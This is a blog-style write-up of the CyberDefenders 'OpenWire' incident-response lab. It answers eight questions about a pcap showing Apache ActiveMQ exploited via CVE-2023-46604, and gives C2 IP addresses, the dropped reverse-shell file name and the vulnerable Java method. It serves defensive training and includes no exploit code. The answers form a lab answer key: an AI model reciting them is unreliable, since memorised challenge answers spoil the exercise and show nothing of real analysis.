GLITCH
  • Who Am I ?
  • WRITEUPS
    • CyberDefenders Labs
      • PhishStrike Write-up
      • OpenWire Write-up
      • BlueSky Ransomware Write-up
      • PsExec Hunt Write-up
      • Red Stealer Write-up
      • Amadey Write-up
      • GrabThePhisher Write-up
      • BlackEnergy Write-up
  • SUMMARIEs
    • Phishing
    • Kerberos_AD
    • Bug Hunting
    • MITRE
  • OSEP
  • GLITCH HUB
    • Books
    • Courses
      • Youtube
    • Githubs
    • Tools
    • Bookmarks
  • Projects
    • Youtube Downloader
  • Malware Analysis
    • SOON!
Powered by GitBook
On this page
  • Scenario:
  • Tools:
  • Questions:
  • 1. By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?
  • 2. Initial entry points are critical to trace back the attack vector. What is the port number of the service the adversary exploited?
  • 3. Following up on the previous question, what is the name of the service found to be vulnerable?
  • 4. The attacker's infrastructure often involves multiple components. What is the IP of the second C2 server?
  • 5. Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?
  • 6. What Java class was invoked by the XML file to run the exploit?
  • 7. To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?
  • 8. What is the vulnerable Java method and class that allows an attacker to run arbitrary code? (Format: Class.Method)
  1. WRITEUPS
  2. CyberDefenders Labs

OpenWire Write-up

الحمد لله والصلاة والسلام على رسول الله وعلى آله وصحبه أما بعد:

PreviousPhishStrike Write-upNextBlueSky Ransomware Write-up

Last updated 6 months ago

Scenario:

During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.

Tools:

  • Wireshark

Link:

Writeup on medium:

Questions:

1. By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?

Answer: 146.190.21.92

2. Initial entry points are critical to trace back the attack vector. What is the port number of the service the adversary exploited?

Answer: 61616

3. Following up on the previous question, what is the name of the service found to be vulnerable?

Answer: Apache Activemq

4. The attacker's infrastructure often involves multiple components. What is the IP of the second C2 server?

Answer: 128.199.52.72

5. Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?

Answer: docker

6. What Java class was invoked by the XML file to run the exploit?

Answer: java.lang.ProcessBuilder

7. To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?

Answer: CVE-2023-46604

8. What is the vulnerable Java method and class that allows an attacker to run arbitrary code? (Format: Class.Method)

Answer: BaseDataStreamMarshaller.createThrowable

After some research, I found this blog () that explains that vulnerability very clearly

Link
https://cyberdefenders.org/blueteam-ctf-challenges/openwire/
https://medium.com/@GLITCHGC/openwire-write-up-06ad77c7200e